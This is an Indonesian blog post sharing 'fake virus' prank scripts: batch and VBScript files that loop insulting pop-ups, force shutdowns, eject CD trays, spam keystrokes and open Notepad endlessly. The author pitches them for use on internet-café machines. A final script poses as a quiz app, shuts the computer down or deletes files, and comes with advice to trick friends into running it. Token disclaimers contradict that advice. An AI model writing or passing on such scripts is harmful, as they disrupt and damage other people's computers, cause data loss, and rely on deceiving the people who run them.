All About Computer

Script Virus Palsu


Kali Ini saya aka Share Kumpulan Script untuk virus palsu, memang ini sangat menjahilkan, target script ini cocok untuk warnet-warnet yang ada di sekitar anda :D
Saran saya jangan digunakan untuk menjahili seseorang. Ini hanya untuk sekedar menambah wawasan anda para pengguna komputer.

1.message yang muncul terus menerus.
Code:

@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

save namafile.BAT



2.bikin shutdown+message
Code:
@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu standar abis"

save namafile.BAT

3.Mainin Caps Lock button
Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

save namafile.vbs

4.buka tutup CD/DVD
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

save namafile.vbs

5.bikin vbscript buka melulu
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
save namafile.vbs
ket:di task manager full wscript yg lg running

6.teken tombol backspace melulu
Code:
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
save namafile.vbs

7.otomatis ngetik "lu jelek banget sih" di notepad/word
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek banget sih!!!"
loop
save namafile.vbs

8.membuka notepad terus menerus
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save namafile.BAT
ket:termasuk yang ngeselin banget nih
bisa di ganti,terserah mau buka cmd ato buka yg lain..ganti aja dir nya.

9.otomatis buka notepad lalu ngetik apa yg Anda mau
Code:
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
 WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "
save namafile.vbs
ket:
kata2 di atas di ganti2 aj sesuai selera temen2
angka2 di atas bisa di modif sendiri (durasi nongol notepad/ngetiknya)

Tambahan Script
 
dari script diatas temen2 kembangin aja lagi...misal kayak gini nih
Code:
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
nah script diatas save jadi quiz.bat kasih ke temen..
pura2 aj bilang ad aplikasi kuis...

ket di atas :
kalo pilih 1.otomatis matiin computer
2.format file (terserah file apaan ganti aj dir nya)
3.sama saja kayak pilihan 1



NB : Jangan Dicoba di PC sendiri. Saya tidak menanggung resiko dari artikel yang sudah saya tulis ini.

Related Post:

:: Get this widget ! ::

Acep Derby Yudha AnggaraDitulis Oleh : Acep Derby Yudha Anggara

Artikel Script Virus Palsu, diterbitkan oleh Acep Derby Yudha Anggara pada hari . Semoga artikel ini dapat menambah wawasan Anda. Oleh Admin, Sobat diperbolehkan mengcopy paste / menyebar-luaskan artikel ini, namun anda harus meletakkan link dibawah ini sebagai sumbernya, dan baca peraturan Disclaimer sebelum copy-paste.

:: Get this widget ! ::

Ditulis oleh: Acep Derby Yudha Anggara -

1 Komentar untuk "Script Virus Palsu"

Pepatah Mengatakan " Masa Depan Bangsa Ada Di Tangan Para Pemudanya "
Maka Komentarlah Dengan Baik Agar Bisa Membangun Blog Ini Dengan Baik
Dan kami mohon kepada pengunjung blog yang baik hati ini untuk join di blog ini tinggal klik DISINI
#No Spam
#No Sara